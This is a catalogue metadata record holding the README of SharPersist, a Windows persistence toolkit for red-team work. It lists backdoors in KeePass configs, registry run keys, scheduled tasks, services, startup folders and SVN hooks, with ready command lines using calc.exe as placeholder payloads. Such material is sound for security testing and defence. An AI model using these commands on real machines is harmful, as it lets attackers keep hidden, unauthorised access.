{"id":19390598,"url":"https://github.com/mandiant/sharpersist","last_synced_at":"2025-04-08T11:11:15.578Z","repository":{"id":37385846,"uuid":"193103215","full_name":"mandiant/SharPersist","owner":"mandiant","description":null,"archived":false,"fork":false,"pushed_at":"2023-08-11T00:52:09.000Z","size":1565,"stargazers_count":1348,"open_issues_count":3,"forks_count":247,"subscribers_count":41,"default_branch":"master","last_synced_at":"2024-07-16T19:53:27.814Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mandiant.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.txt","contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-06-21T13:32:14.000Z","updated_at":"2024-07-15T20:50:12.000Z","dependencies_parsed_at":"2023-10-21T12:08:01.794Z","dependency_job_id":null,"html_url":"https://github.com/mandiant/SharPersist","commit_stats":null,"previous_names":["fireeye/sharpersist"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mandiant%2FSharPersist","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mandiant%2FSharPersist/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mandiant%2FSharPersist/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mandiant%2FSharPersist/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mandiant","download_url":"https://codeload.github.com/mandiant/SharPersist/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247829511,"owners_count":21002997,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-10T10:22:06.787Z","updated_at":"2025-04-08T11:11:15.540Z","avatar_url":"https://github.com/mandiant.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SharPersist\nWindows persistence toolkit written in C#. **For detailed usage information on each technique, see the [Wiki](https://github.com/fireeye/SharPersist/wiki).**\n\nAuthor - Brett Hawkins (@h4wkst3r)\n\n# Release\n* Public version 1.0.1 of SharPersist can be found in the [Releases](https://github.com/fireeye/SharPersist/releases) section\n\n\n# Installation/Building\n\n## Pre-Compiled \n\n* Use the pre-compiled binary in the [Releases](https://github.com/fireeye/SharPersist/releases) section\n\n## Building Yourself\n\nTake the below steps to setup Visual Studio in order to compile the project yourself. This requires a couple of .NET libraries that can be installed from the NuGet package manager.\n\n### Libraries Used\nThe below 3rd party libraries are used in this project.\n\n| Library | URL | License |\n| ------------- | ------------- | ------------- |\n| TaskScheduler  | [https://github.com/dahall/TaskScheduler](https://github.com/dahall/TaskScheduler) | MIT License  |\n| Fody  | [https://github.com/Fody/Fody](https://github.com/Fody/Fody) | MIT License  |\n\n\n### Steps to Build\n\n* Load the Visual Studio project up and go to \"Tools\" --\u003e \"NuGet Package Manager\" --\u003e \"Package Manager Settings\"\n* Go to \"NuGet Package Manager\" --\u003e \"Package Sources\"\n* Add a package source with the URL \"https://api.nuget.org/v3/index.json\"\n* Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.\n  * `Install-Package Costura.Fody -Version 3.3.3`\n* Install the TaskScheduler package\n  * `Install-Package TaskScheduler -Version 2.8.11`\n* You can now build the project yourself!\n\n# Arguments/Options\n\n* \u003cb\u003e-t \u003c/b\u003e - persistence technique\n* \u003cb\u003e-c \u003c/b\u003e - command to execute\n* \u003cb\u003e-a \u003c/b\u003e - arguments to command to execute (if applicable)\n* \u003cb\u003e-f \u003c/b\u003e - the file to create/modify\n* \u003cb\u003e-k \u003c/b\u003e - registry key to create/modify\n* \u003cb\u003e-v \u003c/b\u003e - registry value to create/modify\n* \u003cb\u003e-n \u003c/b\u003e - scheduled task name or service name\n* \u003cb\u003e-m \u003c/b\u003e - method (add, remove, check, list)\n* \u003cb\u003e-o \u003c/b\u003e - optional add-ons\n* \u003cb\u003e-h \u003c/b\u003e - help page\n\n \n# Persistence Techniques (-t)\n* `keepass` - backdoor keepass config file\n* `reg` - registry key addition/modification\n* `schtaskbackdoor` - backdoor scheduled task by adding an additional action to it\n* `startupfolder` - lnk file in startup folder\n* `tortoisesvn` - tortoise svn hook script\n* `service` - create new windows service\n* `schtask` - create new scheduled task\n\n\n# Methods (-m)\n* `add` - add persistence technique\n* `remove` - remove persistence technique\n* `check` - perform dry-run of persistence technique\n* `list` - list current entries for persistence technique\n\n\n# Optional Add-Ons (-o)\n* `env` - optional add-on for env variable obfuscation for registry\n* `hourly` - optional add-on for schtask frequency\n* `daily` - optional add-on for schtask frequency\n* `logon` - optional add-on for schtask frequency\n\n\n# Registry Keys (-k)\n* `hklmrun`\n* `hklmrunonce`\n* `hklmrunonceex` \n* `hkcurun`\n* `hkcurunonce` \n* `logonscript` \n* `stickynotes`\n* `userinit`\n\n\n# Examples\n## Adding Persistence Triggers (Add)\n\n**KeePass**\n\n`SharPersist -t keepass -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\" -m add `\n\n\n**Registry**\n\n`SharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m add`\n\n`SharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m add -o env`\n\n`SharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"logonscript\" -m add`\n\n\n\n**Scheduled Task Backdoor**\n\n`SharPersist -t schtaskbackdoor -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Something Cool\" -m add`\n\n\n**Startup Folder**\n\n`SharPersist -t startupfolder -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"Some File\" -m add`\n\n\n**Tortoise SVN**\n\n`SharPersist -t tortoisesvn -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -m add`\n\n\n**Windows Service**\n\n`SharPersist -t service -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Some Service\" -m add`\n\n\n**Scheduled Task**\n\n`SharPersist -t schtask -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c echo 123 \u003e\u003e c:\\123.txt\" -n \"Some Task\" -m add`\n\n`SharPersist -t schtask -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c echo 123 \u003e\u003e c:\\123.txt\" -n \"Some Task\" -m add -o hourly`\n\n\n## Removing Persistence Triggers (Remove)\n\n\n**KeePass**\n\n`SharPersist -t keepass -f \"C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\" -m remove`\n\n\n**Registry**\n\n`SharPersist -t reg -k \"hkcurun\" -v \"Test Stuff\" -m remove`\n\n`SharPersist -t reg -k \"hkcurun\" -v \"Test Stuff\" -m remove -o env`\n\n`SharPersist -t reg -k \"logonscript\" -m remove`\n\n\n\n**Scheduled Task Backdoor**\n\n`SharPersist -t schtaskbackdoor -n \"Something Cool\" -m remove`\n\n\n**Startup Folder**\n\n`SharPersist -t startupfolder -f \"Some File\" -m remove`\n\n\n**Tortoise SVN**\n\n`SharPersist -t tortoisesvn -m remove`\n\n\n**Windows Service**\n\n`SharPersist -t service -n \"Some Service\" -m remove`\n\n\n**Scheduled Task**\n\n`SharPersist -t schtask -n \"Some Task\" -m remove`\n\n## Perform Dry Run of Persistence Trigger (Check)\n\n\n**KeePass**\n\n`SharPersist -t keepass -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\" -m check`\n\n\n**Registry**\n\n`SharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m check`\n\n`SharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m check -o env`\n\n`SharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"logonscript\" -m check`\n\n\n\n**Scheduled Task Backdoor**\n\n`SharPersist -t schtaskbackdoor -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Something Cool\" -m check`\n\n\n**Startup Folder**\n\n`SharPersist -t startupfolder -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"Some File\" -m check`\n\n\n**Tortoise SVN**\n\n`SharPersist -t tortoisesvn -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -m check`\n\n\n**Windows Service**\n\n`SharPersist -t service -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Some Service\" -m check`\n\n\n**Scheduled Task**\n\n`SharPersist -t schtask -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c echo 123 \u003e\u003e c:\\123.txt\" -n \"Some Task\" -m check`\n\n`SharPersist -t schtask -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c echo 123 \u003e\u003e c:\\123.txt\" -n \"Some Task\" -m check -o hourly`\n\n\n## List Persistence Trigger Entries (List)\n\n\n**Registry**\n\n`SharPersist -t reg -k \"hkcurun\" -m list`\n\n\n**Scheduled Task Backdoor**\n\n`SharPersist -t schtaskbackdoor -m list`\n\n`SharPersist -t schtaskbackdoor -m list -n \"Some Task\"`\n\n`SharPersist -t schtaskbackdoor -m list -o logon`\n\n\n\n**Startup Folder**\n\n`SharPersist -t startupfolder -m list`\n\n\n**Windows Service**\n\n`SharPersist -t service -m list`\n\n`SharPersist -t service -m list -n \"Some Service\"`\n\n\n**Scheduled Task**\n\n`SharPersist -t schtask -m list`\n\n`SharPersist -t schtask -m list -n \"Some Task\"`\n\n`SharPersist -t schtask -m list -o logon`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmandiant%2Fsharpersist","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmandiant%2Fsharpersist","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmandiant%2Fsharpersist/lists"}